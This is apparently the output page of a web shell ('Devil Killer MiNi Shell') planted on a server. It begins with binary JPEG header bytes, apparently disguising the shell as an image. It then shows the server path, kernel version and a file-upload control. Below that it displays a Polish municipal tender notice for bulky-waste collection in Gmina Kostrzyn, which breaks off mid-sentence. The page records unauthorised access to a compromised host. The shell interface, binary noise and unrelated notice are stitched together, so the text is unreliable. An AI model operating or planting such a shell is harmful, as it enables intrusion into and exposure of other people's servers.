JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221024/0040653601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odbiór, transport i zagospodarowanie odpadów wystawkowych z terenu Gminy Kostrzyn” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kostrzyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kostrzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-025</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kostrzyn.wlkp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kostrzyn.wlkp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odbiór, transport i zagospodarowanie odpadów wystawkowych z terenu Gminy Kostrzyn” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9cf68d14-5386-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00406536</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00007060/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Odbiór, transport i zagospodarowanie odpadów wystawkowych z terenu Gminy Kostrzyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania?ContractingEntityCity=kostrzyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób komunikowania się<br/>Zamawiającego z Wykonawcami w postępowaniu (nie dotyczy składania ofert!):<br/>1) komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal, za pośrednictwem dedykowanego<br/>formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. Zamawiający może również<br/>komunikować się z Wykonawcami za pomocą poczty elektronicznej na adres email:<br/>zamowienia@kostrzyn.wlkp.pl.<br/>2) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń (inne niż dołączane do oferty)<br/>składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Zamawiający dopuszcza możliwość składania dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń (innych niż<br/>dołączane do oferty) za pomocą poczty elektronicznej, na adres email: zamowienia@kostrzyn.wlkp.pl.<br/>3) Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz „Formularz do komunikacji”.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu,<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal dostępnym pod<br/>adresemhttps://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Warunkach korzystania z elektronicznej platformy usług administracji<br/>publicznej (ePUAP).<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego<br/>regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz „Formularz do komunikacji” wynosi 150 MB. Przy komunikacji drogą mailową wielkość pliku wynosi<br/>maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XXVIII SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XXVIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZI.271.1.18.2022.IZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest jednorazowy odbiór, transport i zagospodarowanie odpadów wystawkowych z terenu Gminy Kostrzyn. <br/><br/>Gmina Kostrzyn to gmina wiejsko- miejska położona w województwie wielkopolskim, w powiecie poznańskim. Powierzchnia Gminy Kostrzyn wynosi 155 km2, w tym powierzchnia Miasta Kostrzyna- 8 km2. Liczba miejscowości znajdujących się łącznie na terenie Gminy Kostrzyn wynosi 33. Przez obszar Gminy prowadzi droga krajowa o znaczeniu międzynarodowym nr 92 Berlin- Warszawa- Moskwa oraz droga wojewódzka nr 434. Kilka kilometrów od południowej granicy Gminy przebiega autostrada A2, z którą Gmina ma zapewnioną bardzo dobrą dostępność komunikacyjną poprzez drogę ekspresową S-5. Ponadto przez środek Gminy przebiega linia kolejowa E-20 Berlin- Warszawa.<br/><br/>2.	Zakres przedmiotowy zamówienia obejmuje:<br/><br/>1)	odbiór odpadów wystawkowych tzn. odpadów komunalnych, które ze względu na swój rozmiar, wagę, bądź rodzaj nie mogę być umieszczone w pojemnikach lub workach przeznaczonych <br/>do zbierania odpadów komunalnych, od właścicieli nieruchomości zamieszkałych i mieszanych w części zamieszkałej położonych na terenie Gminy Kostrzyn (województwo wielkopolskie, powiat poznański), którzy pozostają w gminnych systemie odbioru odpadów komunalnych, <br/>u źródła ( z miejsca gromadzenia odpadów) z podziałem na:<br/><br/>a)	meble i inne odpady wielkogabarytowe- odpady komunalne, które ze względu na swój rozmiar bądź wagę nie mogą być umieszczane w pojemnikach przeznaczonych do zbierania odpadów komunalnych, w szczególności meble, wózki dziecięce i inwalidzkie, dywany, wykładziny, materace, rowery, zabawki, deski do prasowania, skrzydła drzwiowe;<br/>b)	zużyte opony z pojazdów o dopuszczalnej masie całkowitej do 3,5 ton- zużyte opony pojazdów jednośladowych i samochodowych (z pojazdów o masie całkowitej do 3,5 t);<br/>c)	zużyty sprzęt pochodzących z gospodarstw domowych- odpady w rozumieniu art. 4 pkt 25) ustawy z dnia 11 września 2015 r. o zużytym sprzęcie elektrycznym i elektronicznym ( t.j. Dz. U. z 2022 r., poz. 1622);<br/><br/>Z zastrzeżeniem, iż do odpadów wystawkowych nie zaliczamy części samochodowych oraz odpadów budowalnych i rozbiórkowych o charakterze komunalnymi, w szczególności stolarki okiennej, ościeżnic drzwiowych, części instalacji w postaci np. rur, paneli podłogowych <br/>i ściennych, papy;<br/><br/>2)	transport odebranych odpadów komunalnych, o których mowa w pkt. 1 do miejsca zbierania (zagospodarowania) odpadów, zapewnionego przez Wykonawcę i wskazanego w ofercie,<br/>3)	przekazanie celem zagospodarowania odpadów komunalnych, o których mowa w pkt. 1 do instalacji do odzysku lub unieszkodliwiania odpadów, zgodnie z hierarchią postepowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2021 r. o odpadach (t.j. Dz. U. z 2022 r., poz. 699), zapewnionej/ zapewnionych przez Wykonawcę i wskazanej/wskazanych w ofercie.<br/><br/>3.	Realizacja zmówienia odbywa się zgodnie z przepisami prawa i postanowieniami Opisu Przedmiotu Zamówienia. Wykonawca zobowiązany jest zapewnić, aby realizacja usługi odbywała się zgodnie <br/>z wymaganiami w zakresie ochrony środowiska oraz bezpieczeństwa życia i zdrowia ludzi, w tym <br/>w sposób uwzględniających właściwości chemiczne i fizyczne odpadów oraz zagrożenia, które mogą one powodować.<br/>4.	Szczegółowy harmonogram i termin realizacji usługi zostanie uzgodniony w momencie podpisywania umowy.<br/>5.	Szacunkowa masa odpadów wystawkowych to: 250 Mg.<br/>6.	Szacowana liczba nieruchomości, z których nastąpi odbiór odpadów wystawkowych wynosi:<br/>a)	dla nieruchomości zamieszkałych:<br/>- jednorodzinnych do 4 lokali mieszkalnych 4366 szt.<br/>- wielorodzinnych powyżej 4 lokali mieszkalnych 175 szt.<br/>b)	dla nieruchomości mieszanych:<br/>- jednorodzinnych do 4 lokali mieszkalnych 87 szt.<br/>- wielorodzinnych powyżej 4 lokali mieszkalnych 17 szt.<br/>7.	Planowana ilość odpadów ma charakter szacunkowy i rzeczywista ilość odpadów, które Wykonawca odbierze od Zamawiającego i zagospodaruje może odbiegać od ilości podanej powyższej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511200-4 - Usługi gromadzenia odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90514000-3 - Usługi recyklingu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przy świadczeniu usługi będącej przedmiotem zamówienia przewiduje zastosowanie prawa opcji, o którym<br/>mowa w art. 441 ust 1 ustawy Pzp - max. wartość opcji to 20% względem pierwotnie ustalonej wysokości wynagrodzenia<br/>Wykonawcy. Szczegółowe zasady, sposób oraz zakres w jakim Zamawiający ma prawo do skorzystania przez<br/>Zamawiającego z opcji określa § 10 ust. 4 projektowanych postanowień umowy stanowiących załącznik nr 2 do SWZ. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-12-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia Wykonawcy zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp o łącznej<br/>wartości do 30% wartości zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu podobnych usług, które objęte<br/>były zamówieniem podstawowym, przy zastosowaniu stawek, cen jednostkowych – zgodnie ze złożoną ofertą w postępowaniu na<br/>zadanie podstawowe, a w przypadku ich braku na podstawie indywidualnych negocjacji, w szczególności:<br/>1) odbioru, transportu lub zagospodarowania odpadów wystawkowych w większej ilości niż przewidziana w Rozdziale IV niniejszej<br/>SWZ, w tym również po jej ewentualnym zwiększeniu wskazanego limitu na skutek skorzystania przez Zamawiającego z prawa opcji,<br/>2) realizacji usług odbioru, transportu lub zagospodarowania odpadów komunalnych w innym terminie niż wskazany w Rozdziale II<br/>SWZ.<br/>Warunki, na jakich będą udzielone ww. zamówienia, będą odpowiadały warunkom określonym w dokumentacji niniejszego<br/>postępowania, przez co w szczególności należy rozumieć warunki realizacji usług szczegółowo opisane w projektowanych<br/>postanowieniach umowy stanowiących Załącznik nr 2 do SWZ.<br/>Zamawiający uwzględnił całkowitą wartość tego zamówienia przy obliczaniu wartości niniejszego zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z rozdziałem XXI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium środowiskowe: norma emisji spalin pojazdów, które będą użyte do realizacji przedmiotu zamówienia (E)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający warunki, o których mowa<br/>w art. 112 ust. 2 ustawy Pzp, i którzy wykażą ich spełnianie na poziomie wymaganym przez Zamawiającego zgodnie z<br/>opisem zamieszczonym poniżej oraz niepodlegający wykluczeniu<br/>z powodu okoliczności o których mowa w rozdziale V SWZ.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Wykonawca spełni warunek jeśli wykaże, że posiada:<br/>􀀁􀀁 aktualne zezwolenie na prowadzenie działalności w zakresie odbioru oraz odzysku lub unieszkodliwienia odpadów<br/>komunalnych bądź zapewnienie gotowości przyjęcia odpadów przez przedsiębiorcę prowadzącego działalność w zakresie<br/>odzysku lub unieszkodliwiania odpadów odpadu będących przedmiotem zamówienia zgodnie z ustawą z dnia 14 grudnia<br/>2012 r. o odpadach;<br/>􀀁􀀁 aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych na terenie gminy, z<br/>której<br/>Wykonawca będzie odbierał odpady zgodnie<br/>z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach oraz zgodnie ustawą z dnia 14 grudnia<br/>2012 r. o odpadach;<br/>􀀁􀀁 wpis do rejestru BDO (bazy danych o odpadach) zezwalający na transport odpadów - aktualny wpis do rejestru<br/>podmiotów wprowadzających produkty, produkty<br/>w opakowaniach i gospodarujących odpadami, w zakresie w zakresie niezbędnym do realizacji zamówienia, (transportu<br/>odpadów komunalnych objętych przedmiotem zamówienia).<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt.<br/>2 ppkt. 2) niniejszego rozdziału SWZ, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i<br/>zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>3) sytuacji ekonomicznej i finansowej<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na sumę gwarancyjną nie niższą niż 500 000,00 zł.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek udziału w postępowaniu musi<br/>spełniać co najmniej jeden z Wykonawców.<br/>4) zdolności technicznej lub zawodowej – o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:<br/>a) posiadają wiedzę i doświadczenie do wykonania przedmiotu zamówienia tj. wykaże, że w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje<br/>z należytą starannością co najmniej:<br/> jedno zamówienie (w ramach jednej umowy) usługi odbioru i zagospodarowania odpadów komunalnych polegające na<br/>odbiorze, transporcie i zagospodarowaniu odpadów komunalnych od właścicieli nieruchomości, zgodnie z przepisami<br/>ustawy z dnia<br/>14 grudnia 2012 r. o odpadach oraz ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach o<br/>łącznej masie min. 100 Mg – łącznie w danym roku;<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca w Wykazie zrealizowanych usług (załącznik nr 7 do SWZ),<br/>wykaże, że w wymaganym okresie - w ramach jednej umowy: zrealizował lub aktualnie realizuje, co najmniej jedno<br/>zamówienie dotyczące odbioru i zagospodarowania odpadów o masie co najmniej 100 Mg w zakresie zgodnym lub<br/>szerszym od zakresu przedmiotowego zamówienia oraz załączy do niego dowody potwierdzające, że usługi te zostały<br/>wykonane lub są wykonywane w sposób należyty.<br/>UWAGA:<br/>Zgodnie z art. 117 ust. 1 ustawy Pzp, zamawiający zastrzega, że W przypadku wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, niniejszy warunek nie podlega zsumowaniu, co oznacza, że jeden z wykonawców musi wykazać się<br/>całym wymaganym doświadczeniem (warunek nie będzie spełniony, jeśli wszyscy Wykonawcy w sumie wykazali się<br/>wymaganym doświadczeniem, ale żaden z nich samodzielnie nie wykazał się całym wymaganym doświadczeniem).<br/>b) W zakresie dysponowania odpowiednim potencjałem technicznym - Zamawiający wymaga, aby Wykonawca dysponował<br/>odpowiednim potencjałem technicznym niezbędnym do realizacji przedmiotu zamówienia tj.:<br/>􀀁􀀁 Wykonawca spełni ten warunek jeżeli wykaże, że posiada wyposażenie umożliwiające odebranie odpadów -<br/>specjalistyczny środek transportu 